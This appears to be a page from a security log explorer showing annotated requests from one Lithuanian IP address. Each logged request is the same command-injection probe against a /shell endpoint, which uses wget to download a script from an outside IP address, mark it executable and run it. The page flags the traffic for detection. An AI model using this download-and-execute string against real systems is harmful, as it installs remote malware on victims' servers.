← Back to IP report
Log Explorer
Fact drill-down for
185.36.81.82
Risk
4
LOW
Scope
All time
All-time facts
12
In-scope
12
Filtered
12
Seen
2025-04-10
→
2025-04-11
Freestyle query (contains)
Time (days, optional)
Page size
25
50
100
200
Apply
Reset (all-time)
Active
(none)
Clear
Faceted filters (facts-based)
exact core + snapshot + optional start/end
Annotation facets
Annotator (exact)
(any)
base — 4
cmdi — 4
ua — 4
Severity (exact)
(any)
(none) — 4
28 — 4
8 — 4
Label (exact)
(any)
cmdi — 4
observed — 4
ua — 4
HTTP facets
Method (exact, case-insensitive)
(any)
GET — 12
HTTP status (exact)
(any)
301 — 12
Snapshot facets
Subnet (exact)
(any)
185.36.81.0/24 — 12
ASN (exact)
(any)
209605 — 12
Country / Region / City (exact)
(any country)
Lithuania — 12
(any region)
Kaunas — 12
(any city)
Kaunas — 12
Org contains (ip_org or as_org_name)
Custom time window (optional override)
Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.
Start
End
Tip: keep windows tight when you need speed, but the default is fact-complete.
Top annotators (facts, in-scope)
base
4
cmdi
4
ua
4
Top labels (facts, in-scope)
cmdi
4
observed
4
ua
4
Click a pill to apply it as a filter.
Annotated access events
Showing page
1
/
1
— total
12
rows
← Prev
Next →
#
2025-04-11 09:58:16
event
5559040
GET
301
bytes
169
ann
ua
8
label
ua
Request
Truncated Mozilla User-Agent token
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
ua
rule
ua:truncated_mozilla
conf
70.00
details
Common placeholder UA used by simplistic clients.
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
Truncated Mozilla User-Agent token
details
Common placeholder UA used by simplistic clients.
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
#
2025-04-11 09:58:16
event
5559040
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
event observed
details
—
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
#
2025-04-11 09:58:16
event
5559040
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?wget http://37.221.93.64/bins/abrissy.sh -O /tmp/abrissy.sh; chm'
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?wget http://37.221.93.64/bins/abrissy.sh -O /tmp/abrissy.sh; chm'
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
#
2025-04-11 09:11:47
event
5544444
GET
301
bytes
169
ann
ua
8
label
ua
Request
Truncated Mozilla User-Agent token
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
ua
rule
ua:truncated_mozilla
conf
70.00
details
Common placeholder UA used by simplistic clients.
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
Truncated Mozilla User-Agent token
details
Common placeholder UA used by simplistic clients.
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
#
2025-04-11 09:11:47
event
5544444
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
event observed
details
—
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
#
2025-04-11 09:11:47
event
5544444
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?wget http://37.221.93.64/bins/abrissy.sh -O /tmp/abrissy.sh; chm'
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?wget http://37.221.93.64/bins/abrissy.sh -O /tmp/abrissy.sh; chm'
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
#
2025-04-11 01:38:31
event
5382141
GET
301
bytes
169
ann
ua
8
label
ua
Request
Truncated Mozilla User-Agent token
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
ua
rule
ua:truncated_mozilla
conf
70.00
details
Common placeholder UA used by simplistic clients.
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
Truncated Mozilla User-Agent token
details
Common placeholder UA used by simplistic clients.
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
#
2025-04-11 01:38:31
event
5382141
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
event observed
details
—
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
#
2025-04-11 01:38:31
event
5382141
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?wget http://37.221.93.64/bins/abrissy.sh -O /tmp/abrissy.sh; chm'
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?wget http://37.221.93.64/bins/abrissy.sh -O /tmp/abrissy.sh; chm'
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
#
2025-04-10 23:26:31
event
5341985
GET
301
bytes
169
ann
ua
8
label
ua
Request
Truncated Mozilla User-Agent token
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
ua
rule
ua:truncated_mozilla
conf
70.00
details
Common placeholder UA used by simplistic clients.
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
Truncated Mozilla User-Agent token
details
Common placeholder UA used by simplistic clients.
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
#
2025-04-10 23:26:31
event
5341985
GET
301
bytes
169
ann
base
label
observed
Request
event observed
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
observed
rule
base_observed
conf
—
details
—
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
event observed
details
—
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
#
2025-04-10 23:26:31
event
5341985
GET
301
bytes
169
ann
cmdi
28
label
cmdi
Request
Command/file-injection indicator: cmdi:op_plus_cmd
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
Annotation
facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?wget http://37.221.93.64/bins/abrissy.sh -O /tmp/abrissy.sh; chm'
More (full fields + snapshot)
expand
url
/shell?wget+http://37.221.93.64/bins/abrissy.sh+-O+/tmp/abrissy.sh;+chmod+%2Bx+/tmp/abrissy.sh;+/tmp/abrissy.sh
referer
-
UA
Mozilla/5.0
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /shell?wget http://37.221.93.64/bins/abrissy.sh -O /tmp/abrissy.sh; chm'
subnet
185.36.81.0/24
asn
209605 — UAB Host Baltic
geo
Lithuania, Kaunas, Kaunas
org
SERVEROFFER LT
×
This is a custom alert message.
×
Confirm Action
Are you sure you want to proceed?